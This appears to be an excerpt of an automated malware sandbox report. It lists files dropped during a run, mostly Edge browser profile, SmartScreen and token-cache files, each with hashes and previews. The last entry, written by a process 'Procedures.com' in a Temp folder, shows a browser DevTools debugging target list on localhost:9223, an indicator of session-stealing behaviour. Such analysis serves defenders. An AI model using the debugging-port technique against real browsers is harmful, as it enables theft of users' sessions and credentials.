                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:uriCache_
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.008648044185784
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQATQmy:YWLSGTt1o9LuLgfGBPAzkVj/T8lQAcd
                                                                                                                                                                                                                                                                                                  MD5:B3A726BBE72F0B1F24C5DCB6A95677C6
                                                                                                                                                                                                                                                                                                  SHA1:19C4062BE09D56E86C68AD16059402802B20C55D
                                                                                                                                                                                                                                                                                                  SHA-256:0A89C1A934A6D01A7BAB066BE82DA0266653FC9FEEDA74D48E6E3208BC535915
                                                                                                                                                                                                                                                                                                  SHA-512:7BC1ABEB22C76D3B22BCEEE280A5416A4F190D1F7CBF64277F73E0264A9BAA1C2BBA4A3F111AA4C51DB3CEE8FEDFBC47E1AB8762C8750C9DAC9F3BCDCF4ED425
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735032265429350}]}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                  MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                  SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                  SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                  SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):45749
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088387241761036
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:mMkbJrT8IeQc5d9R59ouAhDO6vP6O7xp+fiP3uFEFhGycfCAomGoup1Xl3jVzXrR:mMk1rT8H19R5L6befLFRomhu3VlXr4i
                                                                                                                                                                                                                                                                                                  MD5:F7802C780D21FF76D561D6316D80080C
                                                                                                                                                                                                                                                                                                  SHA1:7D680C367148C4E40931653141C00178974CF9F0
                                                                                                                                                                                                                                                                                                  SHA-256:625FF7C32808B0EEC1BB26B30A78446F90ADC324853E0C1A5C0604012603A1BD
                                                                                                                                                                                                                                                                                                  SHA-512:6E304F30563E5C53FC40F02A47366C111E1B7D27C9C05AC29975478C0EB526DBC6FF682B564CE51C7826A2EC2E7699CBA8A23A465282979DD5ABF7068E266DD3
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44600
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096219577018695
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fu2lCFTkJv8UDPccGoup1XlI:z/Ps+wsI7ynEf6befGchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:60A20E62DA052BE31ECFCCE48FBD9FC6
                                                                                                                                                                                                                                                                                                  SHA1:1D911DD76A2D6A7DC3C892AE497F944518AA5006
                                                                                                                                                                                                                                                                                                  SHA-256:8AEB2A87780DA87EBC39CDC261F20F867485B722984FE643B2FB3A081CFD1EFF
                                                                                                                                                                                                                                                                                                  SHA-512:1E1471584DC9880071AF4DF8D30DCFEF73536DBEF1B29D479D44B3AE97C655BCD93716921B0D77BC0265E1D7892588325FA500CBF65EEE94000E3F0D4199DB9D
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44616
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096143633957459
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fGDlNkExDcGoup1Xl3jVzXr2:z/Ps+wsI7ynEf6befochu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:3CDF8A9BE299BDDAB55B679E9498D364
                                                                                                                                                                                                                                                                                                  SHA1:B6880DEAB1D667F5FBE730ABDAB52F7DCD5E442D
                                                                                                                                                                                                                                                                                                  SHA-256:F5988E36B9040F2490598CF4674C2DF8F4092155713D4D6D1AFD5FCB51E139C2
                                                                                                                                                                                                                                                                                                  SHA-512:7E2AC40766A11B2B0A3846C9E977A199DC960400EAE3A744BA5DA4CBD610F51436FD14B9ADD7A8D5A6EEDD67DE6C3A41E35E8A261F0C74D11D84792699950278
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.855054237360262
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxtJxl9Il8ugd2UlKtP3qI6bw9q6uHERczd1rc:mKYVUlKtfuc9furU
                                                                                                                                                                                                                                                                                                  MD5:F0A7C1F7FF18F618001EB06B17AF30DB
                                                                                                                                                                                                                                                                                                  SHA1:8C8C28E9557F2D9B1BE470C5FCC98B7547110CF3
                                                                                                                                                                                                                                                                                                  SHA-256:BFAA70E5268B362E2C11A84699D99F8DBDAA6E189D79AAB8532072CF0A16E26B
                                                                                                                                                                                                                                                                                                  SHA-512:33D74B59BEAE18EB7EC4C35A7BB68C24CFB4EC32F27893026493CE8DB098CB49053A8893A8CC5B54E9F825C27EE6138C6D71645A302A94F3967C248B108DB5F3
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"WipwWM+NHlbCDmsZp8SOsjhtFBs="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"gDLSTwNV2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAkMZR9n
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.005192931416091
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:2YR06u4+2kIAfsPj0LOsy1tVuG7Le9bLGkTI0z:21cFmsdt1+G3GKkThz
                                                                                                                                                                                                                                                                                                  MD5:03CFB83EBFC92B35AFF022915CA01F8A
                                                                                                                                                                                                                                                                                                  SHA1:9994EABCFBCDD8AE4763FFE8CBB6FE42CB54FFDA
                                                                                                                                                                                                                                                                                                  SHA-256:5A5E426656CB422BFE1BE622326A6979C5E37ABEC0299155D65E582CFE27956D
                                                                                                                                                                                                                                                                                                  SHA-512:A05D45F7C701DBB19D172B7322DE511D2467019E312388684836DFBB6CAE9AEF4902A46B1B932AC79144BDFC9B4EC38AD15BB17F3AE9837ECCABE2F4C0AFFB5C
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"z3UTqTb37/uzhiflb40fzhDrEsw="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"YfPJNPtU2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AwAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAkMZR9n
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.906924226974215
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7x5wxl9Il8ugdkEMqaw3h3wK+3OAHkD6sqrqGBLud/vc:aoYtvq3wKOkD6PqO
                                                                                                                                                                                                                                                                                                  MD5:040D4BB3198D22A8C82495DDE7731D9D
                                                                                                                                                                                                                                                                                                  SHA1:DF3EB11B8DD631468A8A7FC9361EBCA516DAE0C0
                                                                                                                                                                                                                                                                                                  SHA-256:EBCDF8FE723016D24B5F50E1530AB7A9564DE812184D9C0163CCAD6314D61640
                                                                                                                                                                                                                                                                                                  SHA-512:A09B20C4302779D00ABF26C23A71B21CA9BE1CFDBCF41302B28AC001E0654A194124FE94F7F8828483EDA81CE3FAF4336D59B7B65EDE087599280D6669E67DF0
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"6N3Uy9nAUEqs5u96E/og0E/VJAg="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"lcoDZcxz3AE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAkMZR9n
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3500
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.397547379558348
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:6NnCF4HCQNnC8DdbC8ENnCALz9CAsNnCFdgEC4NnCk9HCRNnC2hDCVNnCQwCNNnA:6NrNyNGNOPN2NXYNxHNA
                                                                                                                                                                                                                                                                                                  MD5:FCC2444210E55539A6DB05EC59E93323
                                                                                                                                                                                                                                                                                                  SHA1:57B17BA92361B76EB093812CC3D7F13EF5A86433
                                                                                                                                                                                                                                                                                                  SHA-256:2E82CFDDB6BB03E5801943B2806B1EC69973613AC9434B12209A9D961784366E
                                                                                                                                                                                                                                                                                                  SHA-512:C1FCA259D790F5B0D7A0053E2EC405516424B23911245BE5D0B9DFB2EFF27B1832ED24FBBF4FD2161A95FD7C8EE6D5912339D3CBEE9CD73A07C809707AA933AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/46BE9ADF6B7C8900F82FE579922A547E",.. "id": "46BE9ADF6B7C8900F82FE579922A547E",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/46BE9ADF6B7C8900F82FE579922A547E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/D1C97884C5E7C2BB9C78227E2F992E7F",.. "id": "D1C97884C5E7C2BB9C78227E2F992E7F",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/D1C97884C5E7C2BB9C78227E2F992E7F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
